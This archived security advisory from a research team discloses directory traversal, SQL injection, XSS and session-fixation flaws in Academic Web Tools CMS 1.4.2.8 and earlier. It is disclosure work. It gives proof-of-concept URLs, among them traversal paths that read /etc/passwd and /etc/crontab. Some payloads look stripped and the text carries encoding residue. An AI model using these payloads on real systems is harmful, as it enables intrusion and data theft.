TUCoPS :: Web :: CMS / Portals :: bx3543.htm

Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities



########################## www.BugReport.ir #######################################=0D 
#=0D
#		AmnPardaz Security Research Team=0D
#=0D
# Title: Academic Web Tools CMS Multiple Vulnerabilities=0D
# Vendor: www.yektaweb.com=0D 
# Vulnerable Version: 1.4.2.8 and prior versions=0D
# Exploit: Available=0D
# Impact: Medium=0D
# Fix: N/A=0D
# Original Advisory: www.bugreport.ir/?/44=0D 
###################################################################################=0D
=0D
####################=0D
1. Description:=0D
####################=0D
	ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too.=0D
####################=0D
2. Vulnerabilities:=0D
####################=0D
	2.1. Directory Traversal in "/download.php" in "dfile" parameter.=0D
		2.1.1. Exploit:=0D
						Check the exploit/POC section.=0D
	2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.=0D
		2.2.1. Exploit:=0D
						Check the exploit/POC section.=0D
	2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters.=0D
		2.3.1. Exploit:=0D
						Check the exploit/POC section.=0D
	2.4. Cross Site Scripting (XSS). Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.=0D
		2.3.1. Exploit:=0D
						Check the exploit/POC section.			=0D
	2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters.=0D
		2.4.1. Exploit:=0D
						Check the exploit/POC section.=0D
	2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service.=0D
		2.5.1. Exploit:=0D
						Check the exploit/POC section.=0D
	2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.=0D
		2.5.1. Exploit:=0D
						Check the exploit/POC section.						=0D
####################=0D
3. Exploits/POCs:=0D
####################=0D
Original Exploit URL: http://bugreport.ir/index.php?/44/exploit=0D 
	3.1. Directory Traversal in "/download.php" in "dfile" parameter.=0D
		-------------=0D
http://[URL]/download.php?dfile=../../../../../../etc/passwd=0D 
http://[URL]/download.php?dfile=../../../../../../../etc/crontab=0D 
		-------------=0D
	3.2. SQL Injection in "/rating.php" in "book_id" parameter.=0D
		-------------=0D
action="http://[URL]/rating.php" method="post">=0D
=0D =0D =0D
=0D -------------=0D 3.3. Reflected XSS attack in "/login.php" in URL parameters.=0D -------------=0D http://[URL]/login.php?Fake==0D -------------=0D 3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.=0D -------------=0D http://[URL]/hta/htmlarea.js.php?glb_sid==0D -------------=0D 3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters.=0D -------------=0D http://[URL]/rss_getfile.php?file=http://BugReport.ir=0D -------------=0D 3.6. Reflected XSS attack in "room.php".=0D -------------=0D First of all, login into the site.=0D Now submit this : =0D at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1=0D -------------=0D 3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.=0D -------------=0D First, clear the site's cookies, and then goto:=0D http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation=0D http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation=0D -------------=0D ####################=0D 4. Solution:=0D ####################=0D Source codes are encrypted. Wait for vendor patch.=0D ####################=0D 5. Credit:=0D ####################=0D AmnPardaz Security Research & Penetration Testing Group=0D Contact: admin[4t}bugreport{d0t]ir=0D WwW.BugReport.ir=0D WwW.AmnPardaz.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH